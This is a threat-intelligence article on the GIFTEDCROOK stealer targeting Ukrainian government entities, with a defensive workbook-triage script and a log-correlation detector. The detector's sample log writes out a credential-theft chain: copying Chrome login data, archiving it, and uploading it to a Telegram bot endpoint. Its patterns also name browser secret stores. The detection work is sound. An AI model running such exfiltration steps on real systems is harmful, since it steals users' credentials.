Emerging GIFTEDCROOK Malware Targets Ukrainian Government Entities

Ukrainian government organizations are confronting a newly identified stealer malware, GIFTEDCROOK. It is built to extract sensitive information from compromised systems, and the institutions it targets make it a matter of national security rather than ordinary cybercrime.

Since February 2025, cybersecurity experts have been monitoring a series of cyber-espionage activities attributed to a threat actor identified as UAC-0226. This campaign has primarily targeted military innovation centers, armed forces units, law enforcement agencies, and local government bodies, especially those situated near Ukraine’s eastern border. The focus on these critical institutions underscores the strategic intent behind the attacks.

On April 6, 2025, the Computer Emergency Response Team of Ukraine (CERT-UA) issued security alert CERT-UA#14303, highlighting the persistent nature of this threat. The GIFTEDCROOK malware is engineered to steal browser-related data, including saved credentials, cookies, and browsing histories from widely used browsers such as Chrome, Edge, and Firefox.

Infection Mechanism Analysis

The infection chain begins with a phishing email. Attackers distribute macro-enabled Excel workbooks (.xlsm) as the initial vector. The lures are themed around landmine clearance, administrative fines, drone production, and compensation for damaged property, topics that are directly relevant to the targeted organizations and therefore likely to be opened.

If the recipient opens the workbook and enables macros, the embedded Visual Basic for Applications (VBA) code runs. It decodes a base64-encoded payload stored in the workbook's cells and writes it to disk without a file extension, so that filters and scanners keyed on executable extensions do not flag the dropped file.
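As an added example (not CERT-UA's or the article's code), the following Python script shows a triage check a defender can run on a suspicious workbook without opening it in Excel: it unzips the OOXML container, checks for a vbaProject.bin part, and scans worksheet and shared-string cells for long base64 blobs that decode to a PE image (MZ header). The workbook it scans is constructed inline with a dummy MZ stub; the payload layout (one base64 string in one cell) is an assumption, since the alert does not describe how the attackers lay out the cells.

```python
import base64
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# SpreadsheetML namespace used by every sheet and shared-string part
SSML = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
MIN_BLOB = 200  # ignore short strings that merely look like base64


def cell_strings(zf):
    """Yield (part name, text) for every <t> element in shared strings and sheets."""
    for name in zf.namelist():
        if name == "xl/sharedStrings.xml" or name.startswith("xl/worksheets/sheet"):
            root = ET.fromstring(zf.read(name))
            for t in root.iter("{%s}t" % SSML):
                if t.text:
                    yield name, t.text


def scan_workbook(data):
    """Return (has_vba, findings) for an .xlsm/.xlsx given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        has_vba = "xl/vbaProject.bin" in zf.namelist()
        for part, text in cell_strings(zf):
            s = "".join(text.split())  # macros often break blobs with line feeds
            if len(s) < MIN_BLOB or not B64_RE.match(s):
                continue
            try:
                blob = base64.b64decode(s, validate=True)
            except ValueError:
                continue
            findings.append({
                "part": part,
                "encoded_len": len(s),
                "decoded_len": len(blob),
                "is_pe": blob[:2] == b"MZ",  # DOS header magic of a PE file
            })
    return has_vba, findings


def triage(data):
    """Verdict for a workbook: 'suspicious' when it carries VBA plus an embedded PE."""
    has_vba, findings = scan_workbook(data)
    if has_vba and any(f["is_pe"] for f in findings):
        return "suspicious"
    return "clean"


# Constructed sample payload: an MZ header followed by filler, not a real executable.
FAKE_PE = b"MZ" + b"\x90" * 300

SHEET_TPL = (
    '<worksheet xmlns="%s"><sheetData><row r="1">'
    '<c r="A1" t="inlineStr"><is><t>Administrative fine notice</t></is></c>'
    '<c r="B1" t="inlineStr"><is><t>%s</t></is></c>'
    '</row></sheetData></worksheet>'
)


def build_sample_xlsm(payload):
    """Build a minimal OOXML workbook (constructed test input) with a base64
    payload in cell B1 and a stub VBA project part."""
    sheet = SHEET_TPL % (SSML, base64.b64encode(payload).decode())
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/worksheets/sheet1.xml", sheet)
        # OLE compound-file signature plus padding stands in for a real vbaProject.bin
        zf.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 16)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_xlsm(FAKE_PE)
    print(triage(sample), scan_workbook(sample)[1])
```

The check is deliberately content-based rather than extension-based: the dropped file has no extension, but the blob that produces it still has to sit somewhere in the workbook. For real samples, run the same scan on the attachment as received and treat "VBA present plus a cell that decodes to MZ" as enough to pull the file for analysis.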

Two primary malware variants have been identified in these attacks:

1. .NET-Based Tool: This variant incorporates a PowerShell reverse shell script sourced from a public GitHub repository known as PSSW100AVB.

2. GIFTEDCROOK Stealer: Written in C/C++, this variant specifically targets and exfiltrates browser data.

After collecting the targeted data, the malware compresses it with PowerShell's built-in Compress-Archive cmdlet, for example:

`Compress-Archive -Path $StolenDataPath -DestinationPath $ArchivePath`

The compressed archive is then exfiltrated to the attackers via Telegram. Because the upload goes to Telegram's own infrastructure over HTTPS, it is hard to distinguish from legitimate messaging traffic on networks where Telegram is in normal use.
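The host-side trace of that archive-then-upload sequence is visible in PowerShell script block logging (Event ID 4104). As an added example, not code from the article or CERT-UA, the script below runs a simple correlation rule over constructed 4104 events: it groups script blocks by host and process and alerts only when a Telegram Bot API call co-occurs with archiving or with browser-database paths in the same process. The Bot API endpoint (api.telegram.org/bot.../sendDocument) is an assumption about how the upload is done; the alert says only that the data leaves via Telegram. The log lines are constructed for the example.

```python
import json
import re

# Indicator patterns. The Telegram host and method are assumptions; the
# browser file names are the standard Chromium and Firefox credential/cookie stores.
INDICATORS = {
    "archive": re.compile(r"\bCompress-Archive\b", re.I),
    "telegram": re.compile(r"api\.telegram\.org/bot", re.I),
    "upload": re.compile(r"\bsendDocument\b", re.I),
    "http_call": re.compile(r"\b(Invoke-RestMethod|Invoke-WebRequest)\b", re.I),
    "browser": re.compile(r"Login Data|Cookies|cookies\.sqlite|places\.sqlite|logins\.json", re.I),
}

# Constructed sample log: one benign backup on an admin box, one two-stage
# archive-and-upload on a workstation, and one unrelated event ID.
SAMPLE_LOG = """
{"EventID": 4104, "Computer": "ADMIN-PC", "ProcessId": 1200, "ScriptBlockText": "Compress-Archive -Path C:/Logs -DestinationPath D:/Backup/logs.zip"}
{"EventID": 4104, "Computer": "WS-042", "ProcessId": 4412, "ScriptBlockText": "Copy-Item $env:LOCALAPPDATA/Google/Chrome/User Data/Default/Login Data $env:TEMP/bd/"}
{"EventID": 4104, "Computer": "WS-042", "ProcessId": 4412, "ScriptBlockText": "Compress-Archive -Path $env:TEMP/bd -DestinationPath $env:TEMP/bd.zip -Force"}
{"EventID": 4104, "Computer": "WS-042", "ProcessId": 4412, "ScriptBlockText": "Invoke-RestMethod -Uri https://api.telegram.org/bot0000000000:PLACEHOLDER/sendDocument -Method Post -Form @{chat_id=1; document=Get-Item $env:TEMP/bd.zip}"}
{"EventID": 4103, "Computer": "WS-042", "ProcessId": 4412, "ScriptBlockText": "Get-Date"}
"""


def load_events(text):
    """Parse one JSON object per line; blank lines are skipped."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def score_script_block(text):
    """Return the names of all indicators that match a single script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def detect(events):
    """Correlate 4104 events per (host, pid) and alert on Telegram plus staging."""
    by_proc = {}
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        key = (ev["Computer"], ev["ProcessId"])
        by_proc.setdefault(key, set()).update(score_script_block(ev["ScriptBlockText"]))

    alerts = []
    for (computer, pid), hits in by_proc.items():
        # A lone Compress-Archive is routine admin work; require the exfil channel too.
        if "telegram" in hits and ("archive" in hits or "browser" in hits):
            alerts.append({"computer": computer, "pid": pid, "indicators": sorted(hits)})
    return alerts


if __name__ == "__main__":
    for alert in detect(load_events(SAMPLE_LOG)):
        print(alert)
```

Grouping by process rather than matching a single block matters here: the compression and the upload are separate script blocks, so a rule that looks for both strings in one event never fires. Script block logging must be enabled for any of this to exist in the first place.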

Further complicating attribution and detection, the threat actors send phishing emails from previously compromised accounts, including webmail services. This tactic leverages the trust associated with known contacts to increase the success rate of the phishing campaigns.

Broader Context

The GIFTEDCROOK malware is part of a larger pattern of cyber-espionage activities targeting Ukraine. Other groups, such as UAC-0200 and UAC-0219, have also intensified their operations throughout the spring of 2025. According to CERT-EU’s annual Threat Landscape Report, 44% of reported incidents in 2024 were linked to cyber espionage or prepositioning tactics typically attributed to state-sponsored actors.

Mitigation Strategies

To defend against such sophisticated threats, organizations are advised to implement the following measures:

– User Education: Conduct regular training sessions to raise awareness about phishing tactics and the importance of scrutinizing unsolicited emails, especially those containing attachments or links.

– Macro Management: Disable macros by default in Microsoft Office documents and allow them only from trusted, signed sources. Keep the default block on macros in files downloaded from the internet (files carrying the Mark of the Web) in place, and do not train users to click through the warning bar.

– Endpoint Protection: Deploy advanced endpoint detection and response (EDR) solutions capable of identifying and mitigating malicious activities.

– Network Monitoring: Monitor outbound traffic for unusual exfiltration patterns, such as uploads to Telegram endpoints from hosts that have no business use for the service, or archives posted to api.telegram.org from workstations. Telegram traffic is encrypted, so inspection has to rely on destination, volume, and the process making the connection rather than on content.

– Access Controls: Enforce strict access controls and regularly review user permissions to minimize the risk of unauthorized access.

By adopting these strategies, organizations can enhance their resilience against the evolving landscape of cyber threats exemplified by the GIFTEDCROOK malware.